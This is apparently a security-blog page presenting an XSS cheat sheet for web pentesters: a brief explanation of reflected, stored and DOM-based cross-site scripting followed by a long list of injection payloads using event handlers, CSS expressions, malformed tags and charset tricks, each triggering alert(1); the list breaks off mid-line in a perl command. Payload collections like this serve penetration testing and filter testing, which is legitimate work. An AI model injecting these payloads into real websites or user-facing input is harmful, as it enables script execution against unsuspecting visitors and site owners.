XSS Cheat Sheet  - XSS Cheat Sheet - Top 500 Most Important XSS Cheat Sheet for Web Application Pentesting

is a very commonly exploited vulnerability type which is very widely spread and easily detectable. Here we are going to see about most XSS .

What is XSS(Cross Site Scripting)? An attacker can inject untrusted snippets of JavaScript into your without validation. This JavaScript is then executed by the victim who is visiting the target site. XSS classified into three types and these XSS Cheat Sheet will help to find the XSS vulnerabilities for Pentesters.

  • Reflected XSS
  • Stored XSS
  • DOM-Based XSS

XSS Cheat Sheet   - xss1 1 - Top 500 Most Important XSS Cheat Sheet for Web Application Pentesting

  • In Reflected XSS, an attacker sends the victim a link to the target application through email, social media, etc. This link has a script embedded within it which executes when visiting the target site.
  • In Stored XSS, the attacker is able to plant a persistent script in the target website which will execute when anyone visits it.
  • With DOM Based XSS, no HTTP request is required, the script is injected as a result of modifying the DOM of the target site in the client side code in the victim’s browser and is then executed.

Most Important XSS Cheat Sheet

<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="http://gbhackers.com/--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:/html;base64,%(base64)s">
<embed src="data:/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img x00src=x onerror="alert(1)">
<img x47src=x onerror="javascript:alert(1)">
<img x11src=x onerror="javascript:alert(1)">
<img x12src=x onerror="javascript:alert(1)">
<imgx47src=x onerror="javascript:alert(1)">
<imgx10src=x onerror="javascript:alert(1)">
<imgx13src=x onerror="javascript:alert(1)">
<imgx32src=x onerror="javascript:alert(1)">
<imgx47src=x onerror="javascript:alert(1)">
<imgx11src=x onerror="javascript:alert(1)">
<img x47src=x onerror="javascript:alert(1)">
<img x34src=x onerror="javascript:alert(1)">
<img x39src=x onerror="javascript:alert(1)">
<img x00src=x onerror="javascript:alert(1)">
<img srcx09=x onerror="javascript:alert(1)">
<img srcx10=x onerror="javascript:alert(1)">
<img srcx13=x onerror="javascript:alert(1)">
<img srcx32=x onerror="javascript:alert(1)">
<img srcx12=x onerror="javascript:alert(1)">
<img srcx11=x onerror="javascript:alert(1)">
<img srcx00=x onerror="javascript:alert(1)">
<img srcx47=x onerror="javascript:alert(1)">
<img src=xx09onerror="javascript:alert(1)">
<img src=xx10onerror="javascript:alert(1)">
<img src=xx11onerror="javascript:alert(1)">
<img src=xx12onerror="javascript:alert(1)">
<img src=xx13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=x09"javascript:alert(1)">
<img src=x onerror=x10"javascript:alert(1)">
<img src=x onerror=x11"javascript:alert(1)">
<img src=x onerror=x12"javascript:alert(1)">
<img src=x onerror=x32"javascript:alert(1)">
<img src=x onerror=x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/%(jscript)s"></script>
<script src="\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo&#10;;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression28javascript:alert(1)29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans273B color3Ared3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<x style="background:url('x&#1;;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>

 

<IMG SRC="http://gbhackers.com/jav&#x0D;ascript:alert("XSS');">
perl -e 'print "<IMG SRC=java

LEAVE A REPLY

Please enter your comment!
Please enter your name here